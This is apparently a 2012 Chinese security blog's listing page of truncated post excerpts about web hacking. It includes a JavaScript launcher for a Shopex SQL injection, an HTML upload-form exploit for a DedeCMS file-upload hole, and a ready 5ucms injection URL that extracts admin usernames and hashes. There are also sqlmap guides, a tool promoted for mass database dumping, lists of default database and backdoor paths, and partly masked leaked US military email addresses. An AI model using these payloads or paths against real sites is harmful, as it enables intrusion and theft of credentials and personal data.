Shopex 4.8.5 SQL Injection Exp

分类:安全 | 2012-06-21 | 撸过 733 次
0人扯谈
<script language="javascript">
    function expstart() {
     var url = document.forms[0].url.value;
     if(url != ""){
      if(url.search("http://") < 0 && url.search("https://") < 0){
       url = "http://" + url;
      }
      document.submit_url.action = url + "/?product-gn[......]

继续阅读

织梦cms v6.7最新上传漏洞

分类:安全 | 2012-06-19 | 撸过 462 次
0人扯谈

EXp:

<form action="http://127.0.0.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>

newname:<input name="newname" type[......]

继续阅读

5ucms 最新版 sql 注入漏洞

分类:安全 | 2012-06-19 | 撸过 547 次
0人扯谈

20120606183325.jpg

漏洞EXP↓ 

/mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin 

放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。

SQLMAP 注射工具用法

分类:安全 | 2012-06-19 | 撸过 582 次
0人扯谈

1 。  介绍
1.1 要求
1.2 网应用情节
1.3 SQL 射入技术
1.4 特点
1.5 下载和更新sqlmap
1.6 执照

2 。 用法
2.1 帮助
2.2 目标URL
2.3 目标URL 和verbosity
2.4 URL 参量
2.5 Google dork
2.6 HTTP 方法: 得到或张贴
2.7 张贴的数据串
2.8 HTTP 曲奇饼倒栽跳水
2.9 HTTP 用户代理倒栽跳水
2.10 任意HTTP 用户代理倒栽跳水
2.11 HTTP 认证
2.12 HTTP 代理人
2.13 串比赛
2.14 遥远的数据库管理系统
2.15 广泛的DBMS 指印
2.16[......]

继续阅读

SQLmap工具介绍及其使用

分类:安全 | 2012-06-19 | 撸过 1,137 次
1人扯谈

http://sqlmap.sourceforge.net/

这是SEVEN大哥写的!:

从黑防上看到他们说是有什么内部的工具,国外的注入工具,python的。想下载看看,结果是vip工具。
就从百度上搜索,没有发现。看来在国内还没有流行。就直接去google上搜索去了。
结果发现了这个工具。
功能非常强大。

我以前的想法,这个工具全都实现了。而且功能更强。新一代的强大工具。我还没有时间来得及分析。感兴趣的朋友可以去研究研究。

开源又功能强大的工具。
尽量不要外传。

支持现在几乎所有的数据库,比国内的任何工具都强。我都开始怀疑穿山甲是不是源自于它。
支持get,post ,cooki[......]

继续阅读

WindowsXP上安装和运行神器SqlMap的步骤

分类:安全 | 2012-06-19 | 撸过 1,269 次
3人扯谈

本文要介绍的是如何在Windows XP上安装和运行SqlMap的安装步骤。

在Windows XP上安装和运行SqlMap的步骤……

1、首先下载SqlMap 点击下载
2、其次下载用于Windows系统的Python ……点击这里……

3、然后安装Python:
Python默认安装的路径是“C:\Python”(你也可以修改安装路径,但要记住路径),直接默认安装“下一步”OK … :)

4、解压SqlMap.zip里面的文件…

5、找到你安装python的目录(对于我来说:C:\Python27中)

6、现在,在python文件夹中创建一个新的文件夹,并命名为“SqlMap[......]

继续阅读

美国国防部数据被Anonymous泄露

分类:新闻 | 2012-06-15 | 撸过 466 次
0人扯谈

 

     美国国防部数据被Anonymous泄露一个匿名的黑客组织“Wikiboat”攻击了美国国防部的网站,他们把从网站上获得的数据发布到了pastebin(点击查看)。此外他们今天还攻击了http://game.de 并使其被迫下线(目前已恢复)。被泄露的国防部数据包括部分官员的名字、email、ID和电话号码等信息

Kenn***osniak@us.army.mil Rich***nst@osd.mil sidney.m***rthur@navy.mil thane***re@verizon.net egyptia***fence@verizon.net dkr***e[......]

继续阅读

K8-MSSQL综合利用工具V1.1 可秒脱百万/千万记录数据

分类:工具 | 2012-06-15 | 撸过 1,657 次
0人扯谈

 

程序:K8-MSSQL综合利用工具V1.0

语言:VS2010 C# (.NET Framework v2.0)

作者:拉登哥哥 QQ:396890445

更新历史:

2012-06-09

[+] BCP导出txt(可导出整个表) 秒脱百万/千万记录

测试导出CSDN 640W数据 仅需10-15秒

[+] 导出htm格式(可导出指定列) 只适合100W以下记录

[+] 修复空格(数据库名/表名/列名)不能导出的bug

[+] 修复纯数字列名/字段不能的bug

[+] 显示当前要导出表的记录总数

下面使用BC[......]

继续阅读

自己写的php木马webshell扫描器

分类:技术 | 2012-06-15 | 撸过 744 次
0人扯谈

因为前端时间服务器被放过 所以写了个webshell扫描器 呵呵 专杀php webshell 不管大马还是小马 包括一句话 现在放出代码来
 

<?php
/*
+--------------------------------------------------------------------------+
| Codz by indexphp           Version:0.01                              |
| (c) 2009 indexphp[......]

继续阅读

在线订单站的一些渗透思路和后门

分类:安全 | 2012-06-15 | 撸过 614 次
0人扯谈

作者:黑面

上现在出现了很多单页面单产品的在线网购站,很多童鞋看了认为很难下手,完全没有思路,其实有的站还是很简单的,我大概总结下我碰到的一些漏洞和后门。

ASP的站基本都是用套叫企业通用管理系统XP版的程序做的。

1.默认数据库

/data/data.asp
/data/data.mdb

2.暴库

/inc/conn.asp
/inc/lconn.asp
/admin/conn.asp
/admin/lconn.asp

3.后门(都是可以直接访问数据库的)

/int/md5s.asp


/admin/admin_Md5.asp?key5=232265

这个页面时加密了的,[......]

继续阅读

第 1 页,共 2 页12